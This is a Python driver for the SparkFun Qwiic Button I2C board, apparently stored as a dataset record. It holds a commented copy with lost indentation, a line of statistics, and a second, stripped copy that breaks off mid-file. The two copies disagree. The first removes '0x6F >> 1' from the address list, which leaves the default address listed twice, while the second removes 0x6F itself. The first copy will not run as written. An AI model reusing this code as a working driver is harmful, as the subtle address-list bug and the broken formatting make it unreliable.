# AUTHORS OR COPYRIGHT HOLDERS BE LIABLE FOR ANY CLAIM, DAMAGES OR OTHER
# LIABILITY, WHETHER IN AN ACTION OF CONTRACT, TORT OR OTHERWISE, ARISING FROM,
# OUT OF OR IN CONNECTION WITH THE SOFTWARE OR THE USE OR OTHER DEALINGS IN THE
# SOFTWARE.
#==================================================================================
"""
qwiic_button
============
Python module for the Qwiic Button.
This python package is a port of the existing [SparkFun Qwiic Button Arduino Library](https://github.com/sparkfun/SparkFun_Qwiic_Button_Arduino_Library)
This package can be used in conjunction with the overall [SparkFun Qwiic Python Package](https://github.com/sparkfun/Qwiic_Py)
New to qwiic? Take a look at the entire [SparkFun Qwiic Ecosystem](https://www.sparkfun.com/qwiic).
"""
#-----------------------------------------------------------------------------------
import math
import qwiic_i2c
# Define the device name and I2C addresses. These are set in the class definition
# as class variables, making them available without having to create a class instance.
# This allows higher level logic to rapidly create an index of qwiic devices at runtime.
# This is the name of the device
_DEFAULT_NAME = "Qwiic Button"
# Some devices have multiple available addresses - this is a list of these addresses.
# NOTE: The first address in this list is considered the default I2C address for the
# device.
_QWIIC_BUTTON_DEFAULT_ADDRESS = 0x6F
_FULL_ADDRESS_LIST = list(range(0x08, 0x77+1)) # Full address list (excluding reserved addresses)
_FULL_ADDRESS_LIST.remove(_QWIIC_BUTTON_DEFAULT_ADDRESS >> 1) # Remove default address from list
_AVAILABLE_I2C_ADDRESS = [_QWIIC_BUTTON_DEFAULT_ADDRESS] # Initialize with default address
_AVAILABLE_I2C_ADDRESS.extend(_FULL_ADDRESS_LIST) # Add full range of I2C addresses
# Define the class that encapsulates the device being created. All information associated
# with this device is encapsulated by this class. The device class should be the only value
# exported from this module.
class QwiicButton(object):
""""
QwiicButton
:param address: The I2C address to use for the device.
If not provided, the default address is used.
:param i2c_driver: An existing i2c driver object. If not provided
a driver object is created.
:return: The QwiicButton device object.
:rtype: Object
"""
# Constructor
device_name = _DEFAULT_NAME
available_addresses = _AVAILABLE_I2C_ADDRESS
# Device ID for all Qwiic Buttons
DEV_ID = 0x5D
# Registers
ID = 0x00
FIRMWARE_MINOR = 0x01
FIRMWARE_MAJOR = 0x02
BUTTON_STATUS = 0x03
INTERRUPT_CONFIG = 0x04
BUTTON_DEBOUNCE_TIME = 0x05
PRESSED_QUEUE_STATUS = 0x07
PRESSED_QUEUE_FRONT = 0x08
PRESSED_QUEUE_BACK = 0x0C
CLICKED_QUEUE_STATUS = 0x10
CLICKED_QUEUE_FRONT = 0x11
CLICKED_QUEUE_BACK = 0x15
LED_BRIGHTNESS = 0x19
LED_PULSE_GRANULARITY = 0x1A
LED_PULSE_CYCLE_TIME = 0x1B
LED_PULSE_OFF_TIME = 0x1D
I2C_ADDRESS = 0x1F
# Status Flags
event_available = 0
has_been_clicked = 0
is_pressed = 0
# Interrupt Configuration Flags
clicked_enable = 0
pressed_enable = 0
# Pressed Queue Status Flags
pressed_pop_request = 0
pressed_is_empty = 0
pressed_is_full = 0
# Clicked Queue Status Flags
clicked_pop_request = 0
clicked_is_empty = 0
clicked_is_full = 0
# Constructor
def __init__(self, address=None, i2c_driver=None):
# Did the user specify an I2C address?
self.address = address if address != None else self.available_addresses[0]
# Load the I2C driver if one isn't provided
if i2c_driver == None:
self._i2c = qwiic_i2c.getI2CDriver()
if self._i2c == None:
print("Unable to load I2C driver for this platform.")
return
else:
self._i2c = i2c_driver
# -----------------------------------------------
# is_connected()
#
# Is an actual board connected to our system?
def is_connected(self):
"""
Determine if a Qwiic Button device is connected to the system.
:return: True if the device is connected, otherwise False.
:rtype: bool
"""
return qwiic_i2c.isDeviceConnected(self.address)
# ------------------------------------------------
# begin()
#
# Initialize the system/validate the board.
def begin(self):
"""
Initialize the operation of the Qwiic Button
Run is_connected() and check the ID in the ID register
:return: Returns True if the initialization was successful, otherwise False.
:rtype: bool
"""
if self.is_connected() == True:
id = self._i2c.readByte(self.address, self.ID)
if id == self.DEV_ID:
return True
return False
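# A hypothetical usage sketch (assumes a Qwiic Button on the default address and
# a working qwiic_i2c driver on this platform):
#
#     button = QwiicButton()
#     if button.begin():
#         print("Firmware: 0x%04X" % button.get_firmware_version())
#         while not button.is_button_pressed():
#             pass
#         print("Button pressed!")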
# ------------------------------------------------
# get_firmware_version()
#
# Returns the firmware version of the attached device as a 16-bit integer.
# The leftmost (high) byte is the major revision number,
# and the rightmost (low) byte is the minor revision number.
def get_firmware_version(self):
"""
Read the register and get the major and minor firmware version number.
:return: 16-bit version number (major byte << 8 | minor byte)
:rtype: int
"""
version = self._i2c.readByte(self.address, self.FIRMWARE_MAJOR) << 8
version |= self._i2c.readByte(self.address, self.FIRMWARE_MINOR)
return version
# -------------------------------------------------
# set_I2C_address(new_address)
#
# Configures the attached device to attach to the I2C bus using the specified address
def set_I2C_address(self, new_address):
"""
Change the I2C address of the Qwiic Button
:param new_address: the new I2C address to set the Qwiic Button to
The function itself checks if the entered parameter is a valid I2C address
:return: True if the change was successful, false otherwise.
:rtype: bool
"""
# First, check if the specified address is valid
if new_address < 0x08 or new_address > 0x77:
return False
# Write new address to the I2C address register of the Qwiic Button
self._i2c.writeByte(self.address, self.I2C_ADDRESS, new_address)
self.address = new_address
return True
# ---------------------------------------------------
# get_I2C_address()
#
# Returns the I2C address of the device
def get_I2C_address(self):
"""
Returns the current I2C address of the Qwiic Button
:return: current I2C address
:rtype: int
"""
return self.address
# ---------------------------------------------------
# is_button_pressed()
#
# Returns 1 if the button/switch is pressed, 0 otherwise
def is_button_pressed(self):
"""
Returns the value of the is_pressed status bit of the BUTTON_STATUS register
:return: is_pressed bit
:rtype: bool
"""
# Read the button status register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but is_pressed
self.is_pressed = int(button_status) & ~(0xFB)
# Shift is_pressed to the zero bit
self.is_pressed = self.is_pressed >> 2
# Return is_pressed as a bool
return bool(self.is_pressed)
# ----------------------------------------------------
# has_button_been_clicked()
#
# Returns 1 if the button/switch is clicked, and 0 otherwise
def has_button_been_clicked(self):
"""
Returns the value of the has_been_clicked status bit of the BUTTON_STATUS register
:return: has_been_clicked bit
:rtype: bool
"""
# Read the button status register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but has_been_clicked
self.has_been_clicked = int(button_status) & ~(0xFD)
# Shift has_been_clicked to the zero bit
self.has_been_clicked = self.has_been_clicked >> 1
# Return has_been_clicked as a bool
return bool(self.has_been_clicked)
# ------------------------------------------------------
# get_debounce_time()
#
# Returns the time that the button waits for the mechanical
# contacts to settle in milliseconds.
def get_debounce_time(self):
"""
Returns the value in the BUTTON_DEBOUNCE_TIME register
:return: debounce time in milliseconds
:rtype: int
"""
time_list = self._i2c.readBlock(self.address, self.BUTTON_DEBOUNCE_TIME, 2)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2)
return time
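    # Worked example for the byte math above (added for clarity): the register
    # is read low byte first and 16 ** 2 == 256, so a raw read of [0x2C, 0x01]
    # decodes to 0x2C + 0x01 * 256 == 300 milliseconds.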
# -------------------------------------------------------
# set_debounce_time(time)
#
# Sets the time that the button waits for the mechanical
# contacts to settle in milliseconds.
def set_debounce_time(self, time):
"""
Write two bytes into the BUTTON_DEBOUNCE_TIME register
:param time: the time in milliseconds to set debounce time to
The max debounce time is 0xFFFF milliseconds, but the function checks if
the entered parameter is valid
:return: Nothing
:rtype: void
"""
# First check that time is not too big
if time > 0xFFFF:
time = 0xFFFF
        # writeWord sends the 16-bit value as two bytes (low byte first),
        # so no manual byte splitting is needed here
        self._i2c.writeWord(self.address, self.BUTTON_DEBOUNCE_TIME, time)
# -------------------------------------------------------
# enable_pressed_interrupt()
#
# The interrupt will be configured to trigger when the button
# is pressed. If enableClickedInterrupt() has also been called,
# then the interrupt will trigger on either a push or a click.
def enable_pressed_interrupt(self):
"""
Set pressed_enable bit of the INTERRUPT_CONFIG register to a 1
:return: Nothing
:rtype: Void
"""
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.pressed_enable = 1
# Set the pressed_enable bit
interrupt_config = interrupt_config | (self.pressed_enable << 1)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# disable_pressed_interrupt()
#
# Interrupt will no longer be configured to trigger when the
# button is pressed. If enable_clicked_interrupt() has also been called,
# then the interrupt will still trigger on the button click.
def disable_pressed_interrupt(self):
"""
Clear the pressed_enable bit of the INTERRUPT_CONFIG register
:return: Nothing
:rtype: Void
"""
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.pressed_enable = 0
# Clear the pressed_enable bit
interrupt_config = interrupt_config & ~(1 << 1)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# enable_clicked_interrupt()
#
# The interrupt will be configured to trigger when the button
# is clicked. If enable_pressed_interrupt() has also been called,
# then the interrupt will trigger on either a push or a click.
def enable_clicked_interrupt(self):
"""
Set the clicked_enable bit of the INTERRUPT_CONFIG register
:return: Nothing
:rtype: Void
"""
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.clicked_enable = 1
# Set the clicked_enable bit
interrupt_config = interrupt_config | self.clicked_enable
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# disable_clicked_interrupt()
#
# The interrupt will no longer be configured to trigger when
# the button is clicked. If enable_pressed_interrupt() has also
# been called, then the interrupt will still trigger on the
# button press.
def disable_clicked_interrupt(self):
"""
Clear the clicked_enable bit of the INTERRUPT_CONFIG register
:return: Nothing
:rtype: Void
"""
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.clicked_enable = 0
# Clear the clicked_enable bit
        interrupt_config = interrupt_config & ~(1 << 0)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# available()
#
    # Returns the event_available bit. This bit is set to 1 if a
# button click or press event occurred.
def available(self):
"""
Return the event_available bit of the BUTTON_STATUS register
:return: event_available bit
        :rtype: bool
"""
# First, read BUTTON_STATUS register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but the event_available bit
self.event_available = int(button_status) & ~(0xFE)
# Return event_available bit as a bool
return bool(self.event_available)
# -------------------------------------------------------
# clear_event_bits()
#
# Sets all button status bits (is_pressed, has_been_clicked,
# and event_available) to zero.
def clear_event_bits(self):
"""
Clear the is_pressed, has_been_clicked, and event_available
bits of the BUTTON_STATUS register
:return: Nothing
:rtype: Void
"""
# First, read BUTTON_STATUS register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear the last three bits
button_status = int(button_status) & ~(0x7)
# Write to BUTTON_STATUS register
self._i2c.writeByte(self.address, self.BUTTON_STATUS, button_status)
# -------------------------------------------------------
# reset_interrupt_config()
#
# Resets the interrupt configuration back to defaults.
def reset_interrupt_config(self):
"""
Enable pressed and clicked interrupts and clear the
event_available bit of BUTTON_STATUS register
:return: Nothing
:rtype: Void
"""
self.pressed_enable = 1
self.clicked_enable = 1
# write 0b11 to the INTERRUPT_CONFIG register
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, 0b11)
self.event_available = 0
# Clear has_been_clicked, is_pressed too
# TODO: not sure if this is right
self.has_been_clicked = 0
self.is_pressed = 0
# Clear the BUTTON_STATUS register by writing a 0
self._i2c.writeByte(self.address, self.BUTTON_STATUS, 0x00)
# -------------------------------------------------------
# is_pressed_queue_full()
#
# Returns true if queue of button press time stamps is full,
# and false otherwise.
def is_pressed_queue_full(self):
"""
Returns the is_full bit of the PRESSED_QUEUE_STATUS register
:return: pressed_is_full
:rtype: bool
"""
# First, read the PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
# Convert to binary and clear all bits but isFull
self.pressed_is_full = int(pressed_queue_stat) & ~(0xFB)
self.pressed_is_full = self.pressed_is_full >> 2
# Return pressed_is_full as a bool
return bool(self.pressed_is_full)
# -------------------------------------------------------
# is_pressed_queue_empty()
#
# Returns true if the queue of button press time stamps is
# empty, and false otherwise.
def is_pressed_queue_empty(self):
"""
Returns the is_empty bit of the PRESSED_QUEUE_STATUS register
:return: pressed_is_empty
:rtype: bool
"""
# First, read the PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
# Convert to binary and clear all bits but is_empty
self.pressed_is_empty = int(pressed_queue_stat) & ~(0xFD)
# Shift pressed_is_empty to the zero bit
self.pressed_is_empty = self.pressed_is_empty >> 1
# Return pressed_is_empty as a bool
return bool(self.pressed_is_empty)
# ------------------------------------------------------
# time_since_last_press()
#
# Returns how many milliseconds it has been since the last
# button press. Since this returns a 32-bit int, it will
# roll over about every 50 days.
def time_since_last_press(self):
"""
Returns the four bytes of PRESSED_QUEUE_FRONT.
Time in milliseconds.
:return: PRESSED_QUEUE_FRONT
:rtype: int
"""
time_list = self._i2c.readBlock(self.address, self.PRESSED_QUEUE_FRONT, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------
# time_since_first_press()
#
# Returns how many milliseconds it has been since the first
# button press. Since this returns a 32-bit int, it will
# roll over about every 50 days.
def time_since_first_press(self):
"""
Returns the four bytes of PRESSED_QUEUE_BACK.
Time in milliseconds
:return: PRESSED_QUEUE_BACK
:rtype: int
"""
time_list = self._i2c.readBlock(self.address, self.PRESSED_QUEUE_BACK, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------
# pop_pressed_queue()
#
# Returns the oldest value in the queue (milliseconds since
# first button press), and then removes it.
def pop_pressed_queue(self):
"""
Returns contents of PRESSED_QUEUE_BACK register and
writes a 1 to popRequest bit of PRESSED_QUEUE_STATUS
register.
:return: PRESSED_QUEUE_BACK
:rtype: int
"""
# Get the time in milliseconds since the button was first pressed
temp_data = self.time_since_first_press()
# Read PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
self.pressed_pop_request = 1
# Set pop_request bit to 1
pressed_queue_stat = pressed_queue_stat | (self.pressed_pop_request)
self._i2c.writeByte(self.address, self.PRESSED_QUEUE_STATUS, pressed_queue_stat)
return temp_data
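    # A hedged usage sketch (not part of the original driver): drain every
    # queued press timestamp. Assumes `button` is an initialized QwiicButton.
    #
    #   while not button.is_pressed_queue_empty():
    #       print("pressed {} ms ago".format(button.pop_pressed_queue()))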
# ---------------------------------------------------------
# is_clicked_queue_full()
#
# Returns true if the queue of button click timestamps is full
# and false otherwise.
def is_clicked_queue_full(self):
"""
Reads the is_full bit of the CLICKED_QUEUE_STATUS register
:return: clicked_is_full
:rtype: bool
"""
# First, read the CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
# Convert to binary and clear all bits but clicked_is_full
self.clicked_is_full = int(clicked_queue_stat) & ~(0xFB)
self.clicked_is_full = self.clicked_is_full >> 2
# Return clicked_is_full as a bool
return bool(self.clicked_is_full)
# ----------------------------------------------------------
# is_clicked_queue_empty()
#
    # Returns true if the queue of click timestamps is empty and false
# otherwise.
def is_clicked_queue_empty(self):
"""
Reads the is_empty bit of the CLICKED_QUEUE_STATUS register
:return: clicked_is_empty
:rtype: bool
"""
# First, read the CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
# Convert to binary and clear all bits but clicked_is_empty
self.clicked_is_empty = int(clicked_queue_stat) & ~(0xFD)
# Shift clicked_is_empty to the zero bit
self.clicked_is_empty = self.clicked_is_empty >> 1
# Return clicked_is_empty as a bool
return bool(self.clicked_is_empty)
# ------------------------------------------------------------
# time_since_last_click()
#
# Returns how many milliseconds it has been since the last button
# click. Since this returns a 32-bit int, it will roll over about
# every 50 days
def time_since_last_click(self):
"""
Returns the four bytes of CLICKED_QUEUE_FRONT register.
Time in milliseconds
:return: CLICKED_QUEUE_FRONT
:rtype: int
"""
time_list = self._i2c.readBlock(self.address, self.CLICKED_QUEUE_FRONT, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# ------------------------------------------------------------
# time_since_first_click()
#
# Returns how many milliseconds it has been since the first button
# click. Since this returns a 32-bit int, it will roll over about
# every 50 days
def time_since_first_click(self):
"""
Returns the four bytes of CLICKED_QUEUE_BACK register.
Time in milliseconds
:return: CLICKED_QUEUE_BACK
:rtype: int
"""
time_list = self._i2c.readBlock(self.address, self.CLICKED_QUEUE_BACK, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------------
# pop_clicked_queue()
#
# Returns the oldest value in the queue (milliseconds since first
# button click), and then removes it.
def pop_clicked_queue(self):
"""
Returns contents of CLICKED_QUEUE_BACK register and
writes a 1 to popRequest bit of CLICKED_QUEUE_STATUS
register.
:return: CLICKED_QUEUE_BACK
:rtype: int
"""
# Get the time in milliseconds since the button was first clicked
temp_data = self.time_since_first_click()
# Read CLICKED_QUEUE_STATUS register
clicked_queue_stat = self._i2c.readByte(self.address, self.CLICKED_QUEUE_STATUS)
self.clicked_pop_request = 1
# Set pop_request bit to 1
clicked_queue_stat = clicked_queue_stat | (self.clicked_pop_request)
self._i2c.writeByte(self.address, self.CLICKED_QUEUE_STATUS, clicked_queue_stat)
return temp_data
# -------------------------------------------------------------
# LED_config(brightness, cycle_time, off_time, granularity)
#
# Configures the LED with the given max brightness, granularity
# (1 is fine for most applications), cycle time, and off time.
def LED_config(self, brightness, cycle_time, off_time, granularity = 1):
"""
Write brightness, cycle_time, off_time, and granularity
parameters to their respective registers: LED_BRIGHTNESS,
LED_PULSE_CYCLE_TIME, LED_PULSE_OFF_TIME, LED_PULSE_GRANULARITY
:param brightness: between 0 (led off) and 255 (max brightness)
        :param cycle_time: total pulse cycle time in milliseconds
Range 0 to 0xFFFF
:param off_time: off time between pulses in milliseconds
Range 0 to 0xFFFF
        :param granularity: the number of steps it takes to reach the LED brightness
If not provided, granularity defaults to 1
:return: Nothing
:rtype: Void
"""
# Write brightness
self._i2c.writeByte(self.address, self.LED_BRIGHTNESS, brightness)
# Write cycle_time
self._i2c.writeWord(self.address, self.LED_PULSE_CYCLE_TIME, cycle_time)
# Write off_time
self._i2c.writeWord(self.address, self.LED_PULSE_OFF_TIME, off_time)
# Write granularity
self._i2c.writeByte(self.address, self.LED_PULSE_GRANULARITY, granularity)
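    # Illustrative values only (not from the original source): pulse the LED
    # at half brightness with a 1 s cycle and a 0.5 s off time.
    #
    #   button.LED_config(brightness=128, cycle_time=1000, off_time=500)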
# --------------------------------------------------------------
# LED_off()
#
# Turn the onboard LED off
def LED_off(self):
"""
        Turn the LED off by writing zeros to LED_BRIGHTNESS,
        LED_PULSE_CYCLE_TIME, and LED_PULSE_OFF_TIME; LED_PULSE_GRANULARITY
        is left at its default of 1 by LED_config().
:return: Nothing
:rtype: void
"""
self.LED_config(0, 0, 0)
# --------------------------------------------------------------
# LED_on(brightness)
#
# Turns the onboard LED on with specified brightness. Set brightness
# to an integer between 0 and 255, where 0 is off and 255 is max
# brightness.
def LED_on(self, brightness):
"""
Set LED on without pulse
:param brightness: between 0 (led off) and 255 (max brightness)
:return: Nothing
:rtype: Void
"""
self.LED_config(brightness, 0, 0)
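# A minimal end-to-end sketch (added as an illustration, not part of the
# original driver). It assumes a SparkFun Qwiic Button on the default address;
# adjust names and timing for your setup.
if __name__ == "__main__":
    import time as _time

    button = QwiicButton()
    if not button.begin():
        print("Qwiic Button not found; check wiring and address.")
    else:
        print("firmware: 0x{:04X}".format(button.get_firmware_version()))
        for _ in range(50):  # poll for roughly 5 seconds
            if button.available():
                print("press or click event seen")
                button.clear_event_bits()
            _time.sleep(0.1)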
| 39.279391
| 153
| 0.601535
|
import math
import qwiic_i2c
_DEFAULT_NAME = "Qwiic Button"
_QWIIC_BUTTON_DEFAULT_ADDRESS = 0x6F
_FULL_ADDRESS_LIST = list(range(0x08, 0x77+1))
_FULL_ADDRESS_LIST.remove(_QWIIC_BUTTON_DEFAULT_ADDRESS)
_AVAILABLE_I2C_ADDRESS = [_QWIIC_BUTTON_DEFAULT_ADDRESS]
_AVAILABLE_I2C_ADDRESS.extend(_FULL_ADDRESS_LIST)
class QwiicButton(object):
device_name = _DEFAULT_NAME
available_addresses = _AVAILABLE_I2C_ADDRESS
DEV_ID = 0x5D
ID = 0x00
FIRMWARE_MINOR = 0x01
FIRMWARE_MAJOR = 0x02
BUTTON_STATUS = 0x03
INTERRUPT_CONFIG = 0x04
BUTTON_DEBOUNCE_TIME = 0x05
PRESSED_QUEUE_STATUS = 0x07
PRESSED_QUEUE_FRONT = 0x08
PRESSED_QUEUE_BACK = 0x0C
CLICKED_QUEUE_STATUS = 0x10
CLICKED_QUEUE_FRONT = 0x11
CLICKED_QUEUE_BACK = 0x15
LED_BRIGHTNESS = 0x19
LED_PULSE_GRANULARITY = 0x1A
LED_PULSE_CYCLE_TIME = 0x1B
LED_PULSE_OFF_TIME = 0x1D
I2C_ADDRESS = 0x1F
event_available = 0
has_been_clicked = 0
is_pressed = 0
clicked_enable = 0
pressed_enable = 0
pressed_pop_request = 0
pressed_is_empty = 0
pressed_is_full = 0
clicked_pop_request = 0
clicked_is_empty = 0
clicked_is_full = 0
def __init__(self, address=None, i2c_driver=None):
self.address = address if address != None else self.available_addresses[0]
if i2c_driver == None:
self._i2c = qwiic_i2c.getI2CDriver()
if self._i2c == None:
print("Unable to load I2C driver for this platform.")
return
else:
self._i2c = i2c_driver
# -----------------------------------------------
# is_connected()
#
# Is an actual board connected to our system?
def is_connected(self):
return qwiic_i2c.isDeviceConnected(self.address)
# ------------------------------------------------
# begin()
#
# Initialize the system/validate the board.
def begin(self):
if self.is_connected() == True:
id = self._i2c.readByte(self.address, self.ID)
if id == self.DEV_ID:
return True
return False
# ------------------------------------------------
# get_firmware_version()
#
    # Returns the firmware version of the attached device as a 16-bit integer.
# The leftmost (high) byte is the major revision number,
# and the rightmost (low) byte is the minor revision number.
def get_firmware_version(self):
version = self._i2c.readByte(self.address, self.FIRMWARE_MAJOR) << 8
version |= self._i2c.readByte(self.address, self.FIRMWARE_MINOR)
return version
# -------------------------------------------------
# set_I2C_address(new_address)
#
# Configures the attached device to attach to the I2C bus using the specified address
def set_I2C_address(self, new_address):
# First, check if the specified address is valid
if new_address < 0x08 or new_address > 0x77:
return False
# Write new address to the I2C address register of the Qwiic Button
self._i2c.writeByte(self.address, self.I2C_ADDRESS, new_address)
        self.address = new_address
        return True
# ---------------------------------------------------
# get_I2C_address()
#
# Returns the I2C address of the device
def get_I2C_address(self):
return self.address
# ---------------------------------------------------
# is_button_pressed()
#
# Returns 1 if the button/switch is pressed, 0 otherwise
def is_button_pressed(self):
# Read the button status register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but is_pressed
self.is_pressed = int(button_status) & ~(0xFB)
# Shift is_pressed to the zero bit
self.is_pressed = self.is_pressed >> 2
# Return is_pressed as a bool
return bool(self.is_pressed)
# ----------------------------------------------------
# has_button_been_clicked()
#
# Returns 1 if the button/switch is clicked, and 0 otherwise
def has_button_been_clicked(self):
# Read the button status register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but has_been_clicked
self.has_been_clicked = int(button_status) & ~(0xFD)
# Shift has_been_clicked to the zero bit
self.has_been_clicked = self.has_been_clicked >> 1
# Return has_been_clicked as a bool
return bool(self.has_been_clicked)
# ------------------------------------------------------
# get_debounce_time()
#
# Returns the time that the button waits for the mechanical
# contacts to settle in milliseconds.
def get_debounce_time(self):
time_list = self._i2c.readBlock(self.address, self.BUTTON_DEBOUNCE_TIME, 2)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2)
return time
# -------------------------------------------------------
# set_debounce_time(time)
#
# Sets the time that the button waits for the mechanical
# contacts to settle in milliseconds.
def set_debounce_time(self, time):
# First check that time is not too big
if time > 0xFFFF:
time = 0xFFFF
# Then write two bytes
self._i2c.writeWord(self.address, self.BUTTON_DEBOUNCE_TIME, time)
# -------------------------------------------------------
# enable_pressed_interrupt()
#
# The interrupt will be configured to trigger when the button
# is pressed. If enableClickedInterrupt() has also been called,
# then the interrupt will trigger on either a push or a click.
def enable_pressed_interrupt(self):
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.pressed_enable = 1
# Set the pressed_enable bit
interrupt_config = interrupt_config | (self.pressed_enable << 1)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# disable_pressed_interrupt()
#
# Interrupt will no longer be configured to trigger when the
# button is pressed. If enable_clicked_interrupt() has also been called,
# then the interrupt will still trigger on the button click.
def disable_pressed_interrupt(self):
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.pressed_enable = 0
# Clear the pressed_enable bit
interrupt_config = interrupt_config & ~(1 << 1)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# enable_clicked_interrupt()
#
# The interrupt will be configured to trigger when the button
# is clicked. If enable_pressed_interrupt() has also been called,
# then the interrupt will trigger on either a push or a click.
def enable_clicked_interrupt(self):
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.clicked_enable = 1
# Set the clicked_enable bit
interrupt_config = interrupt_config | self.clicked_enable
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# disable_clicked_interrupt()
#
# The interrupt will no longer be configured to trigger when
# the button is clicked. If enable_pressed_interrupt() has also
# been called, then the interrupt will still trigger on the
# button press.
def disable_clicked_interrupt(self):
# First, read the INTERRUPT_CONFIG register
interrupt_config = self._i2c.readByte(self.address, self.INTERRUPT_CONFIG)
self.clicked_enable = 0
# Clear the clicked_enable bit
        interrupt_config = interrupt_config & ~(1 << 0)
# Write the new interrupt configure byte
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, interrupt_config)
# -------------------------------------------------------
# available()
#
    # Returns the event_available bit. This bit is set to 1 if a
# button click or press event occurred.
def available(self):
# First, read BUTTON_STATUS register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear all bits but the event_available bit
self.event_available = int(button_status) & ~(0xFE)
# Return event_available bit as a bool
return bool(self.event_available)
# -------------------------------------------------------
# clear_event_bits()
#
# Sets all button status bits (is_pressed, has_been_clicked,
# and event_available) to zero.
def clear_event_bits(self):
# First, read BUTTON_STATUS register
button_status = self._i2c.readByte(self.address, self.BUTTON_STATUS)
# Convert to binary and clear the last three bits
button_status = int(button_status) & ~(0x7)
# Write to BUTTON_STATUS register
self._i2c.writeByte(self.address, self.BUTTON_STATUS, button_status)
# -------------------------------------------------------
# reset_interrupt_config()
#
# Resets the interrupt configuration back to defaults.
def reset_interrupt_config(self):
self.pressed_enable = 1
self.clicked_enable = 1
# write 0b11 to the INTERRUPT_CONFIG register
self._i2c.writeByte(self.address, self.INTERRUPT_CONFIG, 0b11)
self.event_available = 0
# Clear has_been_clicked, is_pressed too
# TODO: not sure if this is right
self.has_been_clicked = 0
self.is_pressed = 0
# Clear the BUTTON_STATUS register by writing a 0
self._i2c.writeByte(self.address, self.BUTTON_STATUS, 0x00)
# -------------------------------------------------------
# is_pressed_queue_full()
#
# Returns true if queue of button press time stamps is full,
# and false otherwise.
def is_pressed_queue_full(self):
# First, read the PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
# Convert to binary and clear all bits but isFull
self.pressed_is_full = int(pressed_queue_stat) & ~(0xFB)
self.pressed_is_full = self.pressed_is_full >> 2
# Return pressed_is_full as a bool
return bool(self.pressed_is_full)
# -------------------------------------------------------
# is_pressed_queue_empty()
#
# Returns true if the queue of button press time stamps is
# empty, and false otherwise.
def is_pressed_queue_empty(self):
# First, read the PRESSED_QUEUE_STATUS register
pressed_queue_stat = self._i2c.readByte(self.address, self.PRESSED_QUEUE_STATUS)
# Convert to binary and clear all bits but is_empty
self.pressed_is_empty = int(pressed_queue_stat) & ~(0xFD)
# Shift pressed_is_empty to the zero bit
self.pressed_is_empty = self.pressed_is_empty >> 1
# Return pressed_is_empty as a bool
return bool(self.pressed_is_empty)
# ------------------------------------------------------
# time_since_last_press()
#
# Returns how many milliseconds it has been since the last
# button press. Since this returns a 32-bit int, it will
# roll over about every 50 days.
def time_since_last_press(self):
time_list = self._i2c.readBlock(self.address, self.PRESSED_QUEUE_FRONT, 4)
time = int(time_list[0]) + int(time_list[1]) * 16 ** (2) + int(time_list[2]) * 16 ** (4) + int(time_list[3]) * 16 ** (6)
return time
# -------------------------------------------------------
# time_since_first_press()
#
